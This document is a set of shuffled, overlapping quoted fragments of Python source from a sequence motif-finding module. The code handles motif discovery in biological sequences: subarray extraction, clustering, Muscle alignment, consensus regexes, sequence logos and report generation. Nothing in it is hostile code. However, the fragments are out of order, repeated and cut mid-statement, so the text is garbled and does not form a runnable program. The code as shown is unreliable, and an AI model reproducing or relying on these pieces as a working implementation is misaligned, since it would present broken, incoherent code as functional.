"(fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return",
"int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq",
"avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th",
"i) for i in motives], reverse=True): info = '#### Motif id: %d' %",
"in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for",
"score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size:",
"if not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d",
"_order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity * 2) # join",
"\"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score)",
"in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1):",
"info2 = ' deleting: %d [%d is now #%d]' % \\ (j, i,",
"None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for",
"\"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys)",
"c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex,",
"i in motives], reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info)",
"freq >= freq_th: if std_th is None or std <= std_th: _motives[cluster_id] =",
"= resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format",
"scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if figure_label: options.logo_label =",
"% (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val",
"in motives], reverse=True): info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq'])",
"+ '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width:",
"+ '/' + fname txt = [] if fill_width: if output_type == 'pdf':",
"args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i)",
"for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info =",
"+ info2) # update motives motives[i] = motif del motives[j] success = True",
"os from collections import defaultdict from eden import apply_async import numpy as np",
"s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig =",
"freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '####",
"for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if",
"serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"= np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position')",
"an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if alphabet",
"= time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get()",
"= max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for",
"[] for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0:",
"c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]:",
"cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm",
"subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for",
"orders = [] for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs):",
"motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 =",
"= freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg",
"%.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = []",
"if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster %d",
"% (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives",
"% e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1",
"min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single')",
"float(size) > regex_th: if letter != '-': code.append(letter) if len(code) == 0: code_str",
"serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' %",
"'\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in",
"norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info)",
"= [id for id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end,",
"def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename,",
"rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j, None): n_i =",
"cluster = np.vstack(cluster) score = 0 to_be_removed = [] for i, row in",
"mismatch: %d != %d' % (len(sig), median_len)) if sigs is None: if len(sig)",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header):",
"time.time() scores = p.get() scores_items += scores d_time = time.time() - start_time d_loc_time",
"(seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids",
"if len(code) == 0: code_str = None elif len(code) == 1: code_str =",
"% (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None,",
"def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs)",
"= components p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end,",
"def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list",
"sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else:",
"secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def",
"plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname,",
"[] for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if",
"ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative",
"url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"",
"src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p",
"sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig ==",
"for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing')",
"seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header,",
"estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except",
"sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list)",
"from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import joblib from",
"= multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size,",
"seq: yield seq seq = \"\" line_str = str(line) yield line_str.strip() else: line_str",
"% (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i,",
"= time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() - start_time",
"select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters",
"+- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname",
"iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time()",
"% (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\"",
"else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None):",
"size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100,",
"neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time =",
"wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format)",
"from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans",
"['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True,",
"'### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size,",
"start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives",
"pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time",
"= [] for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1))",
"all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt =",
"counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std",
"Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' %",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try:",
"min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq",
"style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url +",
"serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process,",
"metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import joblib",
"in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds,",
"update motives motives[i] = motif del motives[j] success = True if success is",
"= multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in",
"self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as e:",
"neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix =",
"min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d",
"size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to",
"st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f' %",
"[] info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info =",
"= [] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j))",
"p.get() scores_items += scores d_time = time.time() - start_time d_loc_time = time.time() -",
"max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq,",
"return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores =",
"vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"% (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\"",
"self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein",
"'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating",
"info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = '",
"secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds)",
"motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg,",
"cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s'",
"selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size",
"cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids)",
"(%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives))",
"len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives else:",
"start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s",
"min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0] return seq def",
"figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts']",
"secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = []",
"neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary)",
"seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10,",
"in ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j =",
"header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end = int(end) subseq =",
"= time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix",
"selected_abs = min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if selected_abs",
"= mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer,",
"score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time",
"in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except",
"- half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]:",
"imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd +",
"url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt)",
"= IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for",
"- %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'],",
"class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(),",
"vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs] return scores def",
"freq_th: if std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if",
"serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable",
"TODO: run the predictor to learn the new class definition logger.debug('After merge, %d",
"self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size",
"np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time",
"params = {'maxiters': 7} if self.diags is True: params['diags'] = True if self.maxhours",
"h, align_seq in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items =",
"the new class definition logger.debug('After merge, %d motives' % len(motives)) return motives def",
"annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = []",
"x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval",
"= len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif =",
"required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an",
"% data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() code = '' for i,",
"items = [] for i in range(n): it = iterable.next() items.append(it) yield items",
"def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th)",
"else: logger.warning( 'No logo to compute. Try more permissive parameters.') def _save_logo(self, logo,",
"enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores d_time = time.time()",
"len(sig) >= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs))",
"python \"\"\"SequenceMotifDecomposer is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import",
"None for scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length",
"= \"\" for line in lines: if line: if line[0] == '>': if",
"occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs)",
"perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check",
"is None: ids = [id for id in motives] seqs_summary = defaultdict(list) for",
"seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet =",
"true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10):",
"results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in",
"logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed",
"= True if success is False: break # TODO: run the predictor to",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try:",
"start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p in enumerate(results):",
"class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self,",
"row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /= norm",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self,",
"%s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix",
"sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO",
"self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr =",
"alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna",
"min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif",
"is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d)",
"= list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start = ids[i] end",
"ids = [cluster_id for cluster_id in motives] logos = dict() for cluster_id in",
"median_len = np.median([len(s) for h, s in seqs]) sigs = None for scores",
"def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity * 2) #",
"in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' -",
"plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname =",
"multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1",
"pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)]",
"vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time()",
"neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix",
"motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] =",
"+= l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack:",
"[list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif",
"p_value: yield orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed iteration.",
"subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 <",
"[''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] =",
"sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign",
"logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids",
"for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting')",
"np.median([len(s) for h, s in seqs]) sigs = None for scores in smod.score(seqs):",
"------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png',",
"2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i,",
"% (begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq)",
"[] for h, align_seq in align_seqs: str_list = [c for c in align_seq]",
"neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator",
"neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time() -",
"figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname #",
"pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time =",
"for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating')",
"loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() -",
"for x in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append(",
"format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info =",
"hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']: tokens",
"end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]:",
"% e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' *",
"in motives], reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image,",
"1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs,",
"_motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq =",
"logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) +",
"neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size",
"Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname)",
"%d %s vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds))",
"subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays =",
"vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs):",
"transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def extract_location(needle, haystack):",
"with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'):",
"== 1: code_str = code[0] else: code_str = '(' + '|'.join(code) + ')'",
"= ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start = logo_range[0]",
"for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get()",
"enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /= norm else: row",
"header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' %",
"): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours",
"= out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\"",
"2) # join all sequences in a cluster with enough space that #",
"xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count",
"= Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code",
"logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as",
"%.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None):",
"binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() -",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val",
"(i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq =",
"subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' %",
"\"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for header, score, begin,",
